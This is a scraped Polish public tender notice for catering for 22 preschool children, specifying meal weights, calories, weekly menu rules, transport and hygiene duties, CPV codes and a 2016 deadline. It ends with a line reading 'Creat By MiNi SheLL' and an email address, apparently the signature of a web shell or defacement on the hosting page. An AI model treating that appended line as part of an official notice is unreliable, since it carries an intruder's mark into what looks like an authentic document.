Proponowane menu w zakresie ciepłych posiłków oczekiwane przez Zamawiającego powinno obejmować  , posiłki (zupa) o kaloryczności ok. 500 kcal i gramaturze  k. 400 g , 100g chleb dla dzieci w dziennych ilościach wskazanych w zamówieniu oraz drugie danie o gramaturze nie mniejszą niż 500 gram , w tym mięso - 100g , surówka-100 g  oraz ziemniaki , ryż kasza lub makaron 300 g .Dwa razy w tygodniu zupa z wkładką  , 2 razy drugie danie mięsne . Jeden raz w tygodniu drugie danie mogą stanowić pierogi , kopytka , naleśniki z serem w ilości 400 gram. Kaloryczność każdego posiłku nie może być mniejsza niż 600 kcal.

Nazwa zadania: Przygotowanie dostawa i wydanie (catering) posiłków dla 22 dzieci w Punkcie Przedszkolnym 

Ilość posiłków :
3212 zestawy całodziennego wyżywienia, obejmującego śniadanie, obiad, deser i podwieczorek.
Na śniadanie należy zapewnić napoje na bazie mleka lub zupę mleczną co najmniej 3 w tygodniu, Obiady powinny być urozmaicone - nie mogą się powtarzać w danym tygodniu. Podwieczorek powinien obejmować ciasto drożdżowe, drożdżówkę lub inne suche pokarmy lub ew. owoce.
Wykonawca odpowiada za zapewnienie transportu posiłków i ich wydanie. Posiłki należy transportować i wydawać z zachowaniem przepisów sanitarnych właściwych ze względu na rodzaj prowadzonej działalności.
Posiłki powinny być wydawane w jednorazowych pojemnikach z atestem i certyfikatem.
Zamawiający dopuszcza dostarczenie ciepłych posiłków w termosach lub innych urządzeniach służących do utrzymania ciepła.
Do Wykonawcy należy odbiór naczyń oraz wszelkie niezbędne zabiegi higieniczne związane z wydawaniem posiłków i odbiorem naczyń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com